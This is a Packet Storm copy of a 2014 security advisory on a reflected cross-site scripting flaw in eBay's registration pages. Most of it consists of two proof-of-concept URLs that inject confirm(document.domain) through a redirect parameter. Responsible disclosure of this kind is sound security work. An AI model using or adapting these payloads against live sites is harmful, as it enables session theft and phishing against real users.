reg.ebay.com Cross Site Scripting

2014-05-26T00:00:00
ID PACKETSTORM:126804
Type packetstorm
Reporter Stefan Schurtz
Modified 2014-05-26T00:00:00

Description

                                        
                                            `Advisory: reg.ebay.com - Cross-site Scripting vulnerability  
Advisory ID: SSCHADV2014-004  
Author: Stefan Schurtz  
Affected Software: Successfully tested on reg.ebay.com  
Vendor URL: http://www.ebay.com/  
Vendor Status: informed  
  
==========================  
Vulnerability Description  
==========================  
  
The website "reg.ebay.com" is prone to a XSS vulnerability  
  
==========================  
PoC-Exploit  
==========================  
  
https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo=&siteid=0&UsingSSL=1&co_partnerId=2&MfcISAPICommand=RegisterEnterInfo&co_partnerId=2  
&siteid=0&ru=http%253A%252F%252Fwww.ebay.com%252Fusr%252Fpatrice.php%253Ffol%253D7df875b8eb5a9c9a78d92c72acc2fb8dd6e6dfa4eee1  
a922ab5464ffcd09d322%2526widget%253Dfollow_113459%22%3bconfirm%28document.domain%29%2f%2f4189ebe3a  
&bin=3984&pageType=3984&register_signin=Register  
  
https://reg.ebay.com/reg/PartialReg?siteid=0&ru=http%3A%2F%2Fwww.ebay.com%2Fusr%2Fpatrice.php%3Ffol%3D7df875b8eb5a9c9a  
78d92c72acc2fb8dd6e6dfa4eee1a922ab5464ffcd09d322%26widget%3Dfollow_113459  
%22%3Bconfirm%28document.domain%29%2F%2F4189ebe3a&MfcISAPICommand=  
  
==========================  
Solution  
==========================  
  
-  
  
==========================  
Disclosure Timeline  
==========================  
  
30-Jan-2014 - ebay informed via  
"http://pages.ebay.com/securitycenter/Researchers.html"  
  
==========================  
Credits  
==========================  
  
Vulnerability found and advisory written by Stefan Schurtz.  
  
==========================  
References  
==========================  
  
http://www.ebay.com/  
http://www.darksecurity.de/advisories/2014/SSCHADV2014-004.txt  
  
  
`